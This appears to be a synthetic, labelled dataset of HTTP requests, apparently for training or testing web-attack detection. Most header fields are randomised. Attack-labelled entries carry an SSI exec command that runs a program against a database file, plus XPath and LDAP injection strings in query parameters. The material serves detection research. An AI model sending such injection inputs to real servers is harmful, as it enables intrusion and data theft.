Cache-Control: no-cache
Client-ip: 50.232.25.8
Cookie: tfoe7shnuu=inhtaccesoo;siaghntgeH5so=Oeewih;gheamtRmrnotoaR=papoTno
Cookie2: $Version="88"
Date: Wed, 13 Sep 06 20:29:15 UTC
ETag: "mkMoih0Lj3Gj6SphZ"
Expect: 100-continue
From: 2a5l@oierufMLhr.com
If-Modified-Since: Thu, 08 Apr 04 05:47:24 CET
If-Unmodified-Since: Sat, 20 Feb 10 16:07:24 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Dec 04 23:29:32 UTC
Max-Forwards: 854
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest response="FcF6f5Fc9A37e66cB49eaBB5B16af622"
Authorization: Digest qop=auth
Range: 6-0447,7686-38299,7705-
Referer: /iIsm/fqts/16Noa.mdb
TE: deflate,trailers,chunked
Trailer: Via
User-Agent: Mozilla/4.1 (X11; U; Open BSD i386 5.0; ml-oe; rv:2.5.7) Gecko/71059442
UA-CPU: 68000
UA-Disp: 492,6280,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7494x790
Via: 2.2 150.36.97.33, 7.4 www.seoL.htm, 9.2 www.nhwns.shtml:96905
Transfer-Encoding: identity
Upgrade: telnx/9.9, iusnr/3.5
Warning: 674 248.72.204.237 "qtwehtZfh" 
X-Forwarded-For: 224.80.134.105
X-Serial-Number: 975545371
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10634
Start - Id: 13985
class: Valid
GET /rawjtdewe/ebK_z2hGZ.png?tboervuSaia=80 HTTP/1.1
Host: 112.170.158.185:84
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: de=Eaett
Client-ip: 110.118.82.42
Cookie: aRcAiuaatlato8s=iQrAQe1;misbhtcEcir=h|ieHNapy0acc
Cookie2: $Version="37"
Date: Mon, 12 Dec 05 08:05:36 GMT
ETag: "L-TQsQGzGcoyaScA1rs"
Expect: 100-continue
From: s8hvitrs@euHho.st
If-Modified-Since: Sat, 17 Mar 07 14:26:31 CET
If-Unmodified-Since: Wed, 21 Sep 05 09:58:22 GMT
If-Match: *
If-None-Match: "3XDonp0HhorGn5pvdRL"
If-Range: ".IPKjer5XO2NbZz"
Max-Forwards: 4074
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: jjvPD Tebkhb=8eehmla
Authorization: Digest algorithm=MD5
Range: 986633-,-445,64-7061
Referer: http://www.6femnnaS.de/rtldahif/uyio/eu6ttt/hnog/O9kipsf.wav
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.8 (compatible; Konqueror/2.9; Win98; siroSXtd)
UA-CPU: 68000
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7780x7588
Via: HTTP/9.6 www.qoeyRc.html:579
Transfer-Encoding: compress
Upgrade: tiowa/3.9, SsnfV/0.1
Warning: 751 www.ninm.html "eskobLtz" 
X-Forwarded-For: 147.149.106.113
X-Serial-Number: 738264285065396
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13985
Start - Id: 29400
class: Valid
GET /7-qNlET/szrhRwk9/ihmfs9beosS/auhiEuaiidaqru/ntcp8ke/k79D1pR3INCTZ-NlQQ1o/my/6wisXy.jpg?eoioprextaiw1tu=n8Lx7Qm&Uss6s=r&dtuped30tnlnsh=%40a5&ph=451730&zeobpsnimrni=bodyzaormb&eaddn=nobject+mailhaving%27ttfIF&aa=eQpumC2Me&iwnny4e=sd7gnah&an=fDenetoeNaoia53e&i7tp=99o+e3thcumetmp5sz2Ar%7E&qrm=hamm&heestsSk=0120&att=788050&gntdaj=xml%2Fcelw&3xecedlyd=2575949 HTTP/1.1
Host: www.zodtena.com
Connection: yNr18w
Accept: audio/*
Accept-Charset: windows-1254
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 152.201.222.227
Cookie: ituieEreire=65260558;me=813654
Cookie2: $Version="58"
Date: Mon, 28 Sep 09 13:49:15 GMT
ETag: W/"r@L8Li8GcYN1uefJ"
Expect: 100-continue
From: onTs@ajeeiGu.com
If-Modified-Since: Tue, 10 Apr 07 13:48:51 UTC
If-Unmodified-Since: Sun, 06 Aug 06 03:46:12 UTC
If-Match: "Zt-QNtMe9Iezp18"
If-None-Match: *
If-Range: *
Max-Forwards: 8610
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest response="A3dad1771A337dd5b4BEC4D3d631aeF3"
Authorization: Digest username="erea"
Range: 61375-,6799-
Referer: /n0ty.tar
TE: chunked,trailers,chunked;q=0.7
Trailer: Range
User-Agent: bhn8tca/9.5.5
UA-CPU: MIPS
UA-Disp: 2709,267,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0011x3310
Via: 2.5 145.27.93.211
Transfer-Encoding: gzip
Upgrade: hoonng/3.0, etnsa/4.8, wUr/4.5, pgotom/4.2, r7etDt/6.9
Warning: 637 216.250.224.103 "tew7rd" "Sat, 20 Sep 08 06:41:50 GMT"
X-Forwarded-For: 2.168.186.132
X-Serial-Number: 55211271758
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29400
Start - Id: 29387
class: Valid
GET /7FbeCir_/w9SttpzyntNu/Oblri/fjN-/ideioehrlnlbgd.pl? HTTP/1.0
Host: www.gWgee.com
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-ce
Accept-Encoding: 
Accept-Language: eieEehaY-sidotg;q=0.6, 6ioehifg-c7evoi, 6Mqc-ecdeo5p, piu-od3, nwti-mL
Cache-Control: min-fresh=66225
Client-ip: 117.25.130.47
Cookie: ituieEreire=65260558;me=813654
Cookie2: $Version="28"
Date: Mon, 20 Oct 08 08:49:07 GMT
ETag: W/"KXncEj1y55DXQgZ3NAOE"
Expect: eascesxn=TdAslls
From: osNmtbzi@essattenoe.ch
If-Modified-Since: Fri, 03 Dec 04 01:53:23 UTC
If-Unmodified-Since: Thu, 25 Oct 07 11:39:36 UTC
If-Match: "vm8S4fyokABGjVA"
If-None-Match: "wEXxc.FN3qKrCS2QQ"
If-Range: "frLRXIvDy.1o5xzM"
Max-Forwards: 1
MIME-Version: 0.8
Pragma: aixi='va6ep'
Proxy-Authorization: NTLM c2hUY2RhY2FhYW9zM2lnb244ZW9leWNyOThOb2ZobjlpdVNzc3RpdHNk
Authorization: Basic ZDRzczpzYmNl
Range: 60-931,-49,8-736
Referer: /ltFeetpe/k2ac/aea3.avi
TE: deflate
Trailer: User-Agent
User-Agent: Mozilla/1.7 (compatible; Konqueror/8.6; Mac OS X; pScohvovw)
UA-CPU: MIPS
UA-Disp: 468,4853,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1934x9864
Via: 9.6 www.eniap.jpeg, 8.7 www.sdz2QxRc.gif:041, HTTP/7.6 46.103.38.123
Transfer-Encoding: Rh7sDe
Upgrade: ntq/7.1, sstu/6.4, uCn/0.4, ane/7.2
Warning: 048 33.183.216.46 "9yhdr3tnxj3u" 
X-Forwarded-For: 2.168.186.132
X-Serial-Number: 50755741783
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29387
Start - Id: 40235
class: SSI
GET /lIcg/otboecse0CijI.html?glrylt=09&teard=reval&iaitdc0egtnan=531688997&1otm=8&9red=52512&Ccd3ecespoees1=996&il=645&snBeRenuaua=hKf6q0V&ieez2ti6cobn6=ie9n-t%26m2tte2rn HTTP/1.0
Host: www.endseMf.biz
Connection: keep-alive
Accept: image/jpeg, application/postscript, audio/*
Accept-Charset: *
Accept-Encoding: <!--    #exec     cmd="c:\progra~1\y6lm\tI36l3u8\s4.exe   d:\ldm\www.arie.org\qwaildidzr\database.mdb  /x     exporttofoxpro"-->
Accept-Language: isieuGhc-e2eaxycE;q=0.5, hs-ie;q=0.3, 7siXDtD4-etx, 4heelp-rebcni, iiMhM-it
Cache-Control: no-cache
Client-ip: 201.49.47.11
Cookie: 2eronlaniieayI=6;XBwindow.openFvhJwindow.openN='rlwS
Cookie2: $Version="36"
Date: Sat, 11 Oct 08 02:00:00 UTC
Expect: eEsi6h
If-Modified-Since: Sat, 03 Jan 09 13:42:42 CET
If-Unmodified-Since: Mon, 01 Nov 04 08:11:19 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 15 Jun 06 07:34:16 CET
Max-Forwards: 4
Proxy-Authorization: NTLM Z3llakRyM3Vjcm42cnl0ZEh0bnRidnVuaHVvczBubG5ldHliZHVS
Range: 24419-8,26976-174670,50232-
Referer: http://www.stgIaqyt.biz/rmntcrr/ansaheT/gRidewl.swf
User-Agent: eaAholc4ite
UA-CPU: MIPS
Via: wy2/6.2 88.118.90.153, HTTP/7.7 65.254.229.79, 4.8 www.oEedeoht.gif
Transfer-Encoding: compress
Upgrade: pat/5.1, n6ps/0.1, ofEr/6.7
----: -----------------------------

null

End - Id: 40235
Start - Id: 49914
class: XPathInjection
GET /pRwcbIxKkcO1vjC/yPqAe-0hc_-/dservices/bUIbfdCiSRqzH.php?eyCdoisf=t4.RPmoN&nbealxbg9jhf=tmd%2FeoTyin%2FI%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D8%5D+or++%27trql%27++%3D++%27&1lQTRP=pY&iagaoiiNll=nTR%40.vlJR&eodim6ik=4o&AcrQ=x3uh7k+t&IedoQehc=65823&ePaso1aoaM8=lhtbrt HTTP/1.0
Host: 238.52.254.142
Connection: 7Hj8h
Accept: */*
Accept-Charset: windows-1252;q=0.2, us-ascii, hz-gb-2312, gb2312;q=0.5
Accept-Encoding: gzip;q=0.7, gzip;q=0.6, gzip;q=0.0
Accept-Language: euo8hh-yt;q=0.9, 4Iaitoei-ite4e, uthykelt-kot, 0toevE8-rgteRahx;q=0.8, iNnr2-ttr;q=0.4
Cache-Control: only-if-cached
Client-ip: 71.34.148.218
Cookie: as1Eothlh=46Tbs;Yopen_link_ExlbF=wNFV4AaRbZU;05r2l=tiprocessing-instruction;4le9irena=?i;r$gE%no;veenlyetmhwnrr=Ee5;uSe9Thaa9=043
Cookie2: $Version="34"
Date: Sat, 11 Jul 09 22:09:18 UTC
ETag: "-PkzT_C75R64usx5m"
Expect: shiNeesn=gk8dcin
From: aelt@h8mn.it
If-Modified-Since: Sun, 30 Aug 09 22:29:16 GMT
If-Unmodified-Since: Fri, 15 Jul 05 04:22:57 UTC
If-Match: "VgRM.hzWFWwvjV@43"
If-None-Match: "ml4grFkCdxqT-bECajWu"
If-Range: *
Max-Forwards: 8
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM d2Rha2V0dHZsd3NyZmVzc25Ub25jaW5lZGVrc3RvZWttckpFbmN1c2w=
Authorization: Digest algorithm=MD5-sess
Range: -983
Referer: /gveaerS/oeWekEu/tjedu.jsp
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.9 (Windows; U; Win 9x 9.0; 5n-Da; rv:0.1.2) Gecko/34516552
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: 4.6 80.105.244.241:61291
Transfer-Encoding: compress
Upgrade: ldT/6.4
Warning: 667 135.165.221.99:10 "Vigl" 
X-Serial-Number: 2013029504
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49914
Start - Id: 6979
class: Valid
PUT /iW@.Bqdd/AmwNlmtucA/edve0BlOcnQj5D/alKfe.DDG3O1Lxe/shihsd3yi/wtt/hBSHS0USr5ZxtUCkFVXw/uYbOGs.cT/kQIhJPG8fS0wzhm/czenm8c2wucsfhr.html? HTTP/1.1
Content-Length: 19
Content-Language: lmqlrcd,718tTe
Content-Encoding: identity
Content-Location: /sinE/rttefR/ao5lacI/TmNro/iAuthaeu.swf
Content-MD5: Y3dydG5uZ3JmZFhCNTNFZw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jan 10 17:18:14 UTC
Last-Modified: Tue, 05 Oct 04 16:55:57 CET
Host: 194.59.169.193
Connection: xtoSl
Accept: */*;q=0.3
Accept-Charset: iso-8859-5, cp-936;q=0.8, shift_jis, us-ascii, x-mac-ce
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 252.24.113.133
Cookie: FSendetpan0lazq=qih9;OWAV0CRIlocationsdocumentS=a7VEEMyh1tqo;syfrn7axiUdvti=rneTecet;am=s xml=xsa
Cookie2: $Version="082"
Date: Wed, 03 Mar 10 14:53:15 UTC
ETag: W/"MK-xpQ6o-rWN-tn3wfa"
Expect: ghuei=Eteee;uhBazrt=i5ld
From: rcaasa4a@Wrn2iB.ch
If-Modified-Since: Mon, 18 Sep 06 02:32:42 GMT
If-Unmodified-Since: Fri, 05 Sep 08 08:15:38 UTC
If-Match: "QGJW94s3JIy2dgd"
If-None-Match: *
If-Range: Sat, 11 Jul 09 17:03:48 UTC
Max-Forwards: 355
MIME-Version: 2.6
Pragma: teszo=siNzqta
Proxy-Authorization: Digest qop=auth
Authorization: NTLM ZWF5aHNhNjlyOG9JdGlpVGxhdW9FaHJ5aU15dHNqcHBsc2tjcmNOcnQ=
Range: 2338-,-6,504171-
Referer: http://www.rgla.net/eonnra/cqre/e2Khuowz.dll
TE: gzip;q=0.5,trailers,trailers
Trailer: Host
User-Agent: Mozilla/1.4 (Machintosh; U; Mac OS X 3.3; tt-29; rv:7.9.9) Gecko/71866636
UA-CPU: 68000
UA-Disp: 337,1606,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 040x289
Via: 0.2 173.22.97.34, tw8o7E/4.9 16.114.166.47
Transfer-Encoding: ati4o
Upgrade: srd/5.1, ndhns/4.1
Warning: 295 140.22.217.163 "uv2fUxytlf3rEnqh" "Sun, 03 Jun 07 20:15:54 GMT"
X-Forwarded-For: 59.212.176.168
X-Serial-Number: 95729667
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aurdaA7nai=agiHphpc

End - Id: 6979
Start - Id: 227
class: Valid
GET /trIfeneEg0kperledn/yX4.PnhA7aOEWqfBtfl/anm4zXfYBD.ty8I/EzmBQIH/axq/disavn7/s3Igneinietiam/8YXQCL.jpeg? HTTP/1.1
Host: www.egmey.com
Connection: close
Accept: application/zip;q=0.7, text/plain;q=0.7, image/*;q=0.3
Accept-Charset: x-mac-roman;q=0.6, windows-1250;q=0.2, x-mac-chinesetrad;q=0.4, x-mac-icelandic;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.9
Cache-Control: max-stale=75
Client-ip: 99.49.237.73
Cookie: ohmoa=Rori~lra/nNs ;rm=42
Cookie2: $Version="1"
Date: Fri, 22 May 09 03:26:49 CET
ETag: "isEz1WpfU9Phbh11J1p"
Expect: 100-continue
From: 0doILoeo@uhagi7pind.be
If-Modified-Since: Thu, 27 Aug 09 17:55:36 GMT
If-Unmodified-Since: Sat, 20 Dec 08 21:40:27 CET
If-Match: "Bct1htSe3mf@GdRJwiw"
If-None-Match: *
If-Range: Thu, 26 Jan 06 09:43:36 CET
Max-Forwards: 407
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic ZXRlc2c0OmFwaWNn
Authorization: payb aRaonr=30ei
Range: 46-,9-788359,-8100
Referer: http://www.nadesglw.org/tdoiof/ozk5e/xyee8feJ.jpeg
TE: deflate,deflate,trailers
Trailer: From
User-Agent: rfveez http://www.rlshro.be
UA-CPU: StrongARM
UA-Disp: 0159,402,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4314x599
Via: 5.3 www.ghepngin.png, 6.0 16.163.39.67:7877, 8.6 125.137.94.253
Transfer-Encoding: dGc5eg; 0TssesN=Eeyal
Upgrade: tden/0.3, ytuoof/6.0, Hl57r/7.7
Warning: 582 65.217.95.237 "athescdhZEt" "Fri, 04 Nov 05 16:53:44 UTC"
X-Forwarded-For: 73.229.35.89
X-Serial-Number: 543176646473
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 227
Start - Id: 49177
class: XPathInjection
GET /ernmOnobs/cfromvCYY3f4_QXYra/nxaefcertsMototmqpc/dN-QiP/to2RVXnHxHifbi/2LHVRhavinggDREDng/r4dxfUm/ooepbec5/fcSFGeRxV6E.FU5Uplu/sK4@UJWjijtAiOydtD/rh/Py-KnfKl.jpeg?0sshei=%29hnMLlike%3D%2B&ueEwniEogxirpsu=Arsak%27++or++++viNn4%2F0%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D928%5D+++++or+++++%27vliB8o5i%27+++%3D+++%27&t6erlwsOs=r9iMTCmjleeZ1i&dtexnlllmeeur=zakirktocd1sotWK&nRronsajuh=nma&tpmtnntsnxdb=tTKznl&orizonh=844&qsmn8ni=a4tAetmpEio&eeyrcotner=vzs&NrfpisMmArdPeb=04&lEsEeYtedutgaqa=%27novn%27x+pscn-&ntjibirnis=i-gQQ&4Z0dkxterm0J4=bhA&nl12o6edac=9 HTTP/1.1
Host: 206.92.129.24
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-roman;q=0.4, euc-tw;q=0.8, euc-jp
Accept-Encoding: gzip;q=0.4, identity
Accept-Language: *;q=0.5
Cache-Control: max-stale=77024
Client-ip: 222.14.181.160
Cookie: lT5OixoMos=b;syomGj7u1d=ebody;osEbedtna=saetRttnt;dspk=E;soEhoHemap=iyNzenbxDA2;n3fgEliurjeef=xmln4o
Cookie2: $Version="1"
Date: Thu, 07 Sep 06 20:31:59 CET
ETag: "I4LM-0MgNgkmOnkc-s3"
Expect: 100-continue
From: iahsis@optiai.de
If-Modified-Since: Sun, 07 Jun 09 10:21:57 CET
If-Unmodified-Since: Wed, 04 May 05 22:06:44 UTC
If-Match: *
If-None-Match: "0Yg8f6_vXNgCq-M-twq0"
If-Range: Wed, 23 Feb 05 15:21:09 CET
Max-Forwards: 5
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Basic NGk2ZWVsOnJhcm1sSGM=
Range: -695984
Referer: http://trjTtti.com/cIead/xgrnw/reucgsst/irEp.jpeg
TE: trailers,deflate,deflate;q=0.8
Trailer: Host
User-Agent: 3asecg3jtAdtt
UA-CPU: x86
UA-Disp: 146,749,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 290x3654
Via: FTP/1.8 18.2.78.251:315
Transfer-Encoding: deflate
Upgrade: q8iste/1.0, ici/0.5, qtyr3/1.9, oea/6.5, h1e5st/7.2
Warning: 382 78.125.64.215 "ptlueeneohddxrty" "Fri, 18 Jul 08 15:26:47 UTC"
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 49177
Start - Id: 38489
class: LdapInjection
GET /5Erebantto0htbs/bdslof6Wmn/olVZa/55p8srpt6en0rve2ai/tmNN/sOaM9CfsG/0t/nV0UbGL6Vs1qbz/usa/e0xsMEtMm/ba2AufkdxdKlbj/pOInWD.htm?jllumchtnn=0009559&wNttrv=%29++++%28+%7C%28cn%3D*o+%27brien*++++%29%28mail+%3D*o%27brien*++++%29++&-sock_streamFSvarjHWyNg=61&ja0nqtdnecnaeE=840&qBGLzprocessing-instructionjutU=i8nmM4&nar=%29n&jtme=xeOQxPEugt8z&eebelyno=83&twolGearne=rms3sock_streame%29ant&9ftmhlnh=rmX%40XZ&Reb6Jynph-1=cftpily%3Dar&earMioysegstn=1&yy=797763&RLMQepaccess_logyU=%28o%3F%3F HTTP/1.1
Host: 181.216.73.68
Connection: keep-alive
Accept: text/*
Accept-Charset: windows-1258;q=0.3, windows-1250;q=0.3, big5;q=0.3, iso-8859-2;q=0.8, utf-8
Accept-Encoding: *;q=0.1
Accept-Language: ae-gE;q=0.2, 0aEjh7hb-xseep9E;q=0.8
Cache-Control: no-transform
Client-ip: 233.33.102.205
Cookie: a2noqlddganpoad=tcde2ilibrexrreplacei;6enc=35983;6vgwzQCGQJRa= og;httpsB7ds-49=0549960242;e4yyeorvb=xsl w2r5Elnw;n3np9pu58=0253
Cookie2: $Version="370"
Date: Tue, 21 Oct 08 21:09:21 CET
ETag: "TciWgfyFegrTeCENGp.D"
Expect: deissg=asa6
From: yowh@sjoa6l6daa.gov
If-Modified-Since: Tue, 13 Apr 10 06:20:18 CET
If-Unmodified-Since: Mon, 24 Jul 06 14:24:06 UTC
If-Match: *
If-None-Match: "e0zXWHps5LVgWjXu"
If-Range: "Y5l-KcAjxcMwAM5DAc"
Max-Forwards: 3
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM cnRlY3VraXJoOG9lNXNvcXJpcnBrU3dSMXRJRXRsZHRhRVRm
Range: -58851,3847-,8968-910
Referer: http://yriotai.com/rm0a/ouPr/VoIe.wav
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/3.1 (compatible; ssnifl8; Mac OS X; Set5nuxD; tteaTas; n1GL)
UA-CPU: 68000
UA-Disp: 2438,693,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6621x951
Via: HTTP/8.8 www.ittyoat.js, seseA/9.2 www.nscy8ssy.png:1321, FTP/4.5 163.31.200.197:4154
Transfer-Encoding: identity
Upgrade: atd/6.6, fyohd/5.4, rwOx/2.2, 2patf/9.0, swe/3.6
Warning: 748 218.206.210.84 "59neemNylty8eilereeP" "Tue, 26 Feb 08 18:29:12 UTC"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 8565701730547644653
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38489
Start - Id: 20265
class: Valid
GET /eUy@VjfGGMXwH8XY/n7dyx/voeiqetaai/yiVLLjZvfi/lul1wrztmwtAgltni9il.mdb?IrahH3Sheht=ek2&q6Oltmp_5=passthruoformocmdta%29i+3uLtt&eteno=eseciutaSuyo%5C&qlld5dj=40&i3JWimailsock_streamPdNC2=a&Heopw=uevrNraned&rcAsO2eramrsnw=v-i6UE8f&Enipfo=cxklWJt&sSierkc4a=lrps3eaIr4 HTTP/1.0
Host: www.eiop.st:1
Connection: mn7nf
Accept: */*;q=0.5
Accept-Charset: x-mac-icelandic, iso-8859-4, iso-2022-kr;q=0.5, x-mac-chinesetrad;q=0.5
Accept-Encoding: deflate, compress
Accept-Language: drtp0-ng, wh-hnt8axes;q=0.5
Cache-Control: no-store
Client-ip: 66.96.116.160
Cookie: XTlQLAV=839;XwpTymEXo=80;2Rbzd@--tXel=er;u4Ih88tdeflea=974;ecciyvetvuor2=gesr-4 a wowmr/sD;letnes=f
Cookie2: $Version="389"
Date: Tue, 05 Feb 08 10:54:10 CET
ETag: "GRSd.RAB2xqYJdR"
Expect: 100-continue
From: eoean@ohdnpug.com
If-Modified-Since: Sun, 06 Jul 08 10:32:56 GMT
If-Unmodified-Since: Sat, 17 Dec 05 11:05:48 CET
If-Match: "cF.nRbAfVdaIirbf9kFK"
If-None-Match: "CF3P7yBCA.4zi5d59"
If-Range: Wed, 28 Apr 04 13:10:22 GMT
Max-Forwards: 9
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Y25lYWFlZXJybjZHZXNkYXRzY21ld2VvZG5zOHVhaGRseGVmZWVodGd3c29lbA==
Authorization: NTLM a3Rzbnhyc2V0dXRuMFNhZGhBdFBMYTBxQWU2d291anIya2FVNld0b3NjYXVyWA==
Range: -064
Referer: http://www.oqp0ngeo.gov/xelorEh/Ee0dxltt.tiff
TE: trailers,chunked,deflate
Trailer: Accept-Language
User-Agent: 9ptugjrt (lTwVZNWiBK; tKJjxJcm2W)
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2457x531
Via: N1rri/2.2 www.nke7e.jpg, HTTP/7.2 www.otP4.tiff:0843, sNc/0.1 www.aq5nle.gif
Transfer-Encoding: identity
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 058 www.eyes9l.tiff "iseRqeh6t" 
X-Forwarded-For: 33.165.104.226
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 20265
Start - Id: 9822
class: Valid
GET /srieyddlae/e9Cn.jpg?unmuOd=cQfrgYZD&x2W6Oo8v76=thomehmr+&is8edhsalaEfro=wqy+t HTTP/1.0
Host: www.pyxk.it
Connection: close
Accept: text/xml;q=0.3, application/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: Ry-tdHtb;q=0.7, 0i-tb;q=0.7, c1iSdxy-eawnelev;q=0.6
Cache-Control: min-fresh=9102
Client-ip: 154.226.115.13
Cookie: rtoGneoaetgee7r=3OtmiE8jaasse;Ns4txpB=:dnlls25E'
Cookie2: $Version="48"
Date: Sat, 27 May 06 05:12:35 UTC
ETag: W/"Yen6HXQEpi1sTb5"
Expect: eEi2etos=tniHa;trhne=tustf1a
From: s2ee@yeibttnums.uk
If-Modified-Since: Mon, 10 Jul 06 04:55:24 UTC
If-Unmodified-Since: Fri, 13 Feb 04 10:55:18 UTC
If-Match: *
If-None-Match: ".h8h8kpcexJzlDv8y4"
If-Range: Tue, 29 Aug 06 07:28:05 UTC
Max-Forwards: 9
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest qop=dARhoRu
Authorization: NTLM dXJsMlJlbTJnNWV0MHNFbmF3OGFldWRORGlvaHhhdWhObm5yb2ZzaWZncmVzZg==
Range: -6
Referer: /dEuiayv7/8serezd/gsrna/irlwfhrr.php
TE: chunked,trailers,chunked
Trailer: Via
User-Agent: elvolgI http://www.ntsw.com
UA-CPU: PowerPC
UA-Disp: 197,9034,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3832x6503
Via: FTP/0.2 2.51.180.216:970
Transfer-Encoding: lots9
Upgrade: irldv/6.7
Warning: 093 www.qy84ose.js "sotfb3eWg" "Sat, 25 Dec 04 19:24:10 UTC"
X-Forwarded-For: 239.251.116.128
X-Serial-Number: 09946739061718
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9822
Start - Id: 29971
class: Valid
GET /eaSkW_BAih3S6CIjmr3n/n2u/76H8ZAI4a/tKbqCiVWyx6PebxYKE.shtml?qjr=5570&fhnkkHreh=gep5h8retcUtal4y&ispenc4ratiivna=45844580&bHklnsntfyk=on%3Bpsyperlr&ih=tmrssloeqdEnjtm&aaehpeo=lfa%5D&dnkPfedi7=e7nd_7&ykta2=7+lofctg%7E&erUgsg=py84egcc+heS%27U&ndeitieilyjphee=rOtnoheuroelc&otieugddnaaf=098&dr7=e6dsts&eiHnka5lewuiO0t=7132170118 HTTP/1.0
Host: www.ne9otini.st
Connection: keep-alive
Accept: audio/x-wav;q=0.6, audio/*;q=0.6
Accept-Charset: x-mac-roman;q=0.2, euc-kr, isiri-3342;q=0.3, x-mac-korean, koi8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: LkNLdrha='5'
Client-ip: 247.18.105.163
Cookie: 6hrzNsjjrx2e=6iGctYZG-;dbsr=ei;mtSrh5dt=7te;ootestn=mscriptoptidocument;7abu=em4Y3z3pL
Cookie2: $Version="71"
Date: Wed, 24 Jan 07 01:54:46 UTC
ETag: W/"hu@1fke@0C9Ln8qFHkn"
Expect: rieTrx
From: nAen2Ew@Xo7tyav4o.biz
If-Modified-Since: Sun, 21 Jan 07 08:37:29 UTC
If-Unmodified-Since: Thu, 24 Jul 08 06:25:56 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 18 Jan 07 20:17:42 GMT
Max-Forwards: 9
MIME-Version: 0.1
Pragma: oytA6i='h9lEwzhi'
Proxy-Authorization: atyh matlcbq=soaSa
Authorization: NTLM ZmhyU3R6T3RyZzZpcGxodFRtMWVoaGJndHBvc29vY2d1aWEwaDc=
Range: 89712-
Referer: http://tct0.de/zjwgs/lrcz3xe.swf
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.0 (Machintosh; U; Mac OS X 5.4; l7-ft; rv:7.8.4) Gecko/50460419
UA-CPU: 68000
UA-Disp: 644,8528,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 797x977
Via: 7.5 53.121.189.61
Transfer-Encoding: compress
Upgrade: eds/9.2, isa/3.3, kej/9.4
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 80.188.232.109
X-Serial-Number: 2857393
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29971
Start - Id: 29263
class: Valid
GET /eKit04/stet3ioiiswSbC2/eo/cRvfe/ttTbeHbothbzqT/s2asroeoqp5o/O2ceroa/olsiscmavchiio7fftwd.bin?7raohhjcvt=cjM.&ftovm=15&sg=t5JYheioNU&@hscriptlsNhome1Oh=n9t%40&NbinJnullvMHFK=9457513&ui=6&r2oufeattrido=h%28%5C1vbscript&hox=oincluder3ne&5tttemahwti7=18885284&s0c=1lmashutdowntnso HTTP/1.1
Host: 13.118.161.18:80
Connection: iarte
Accept: application/*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=11
Client-ip: 52.236.75.153
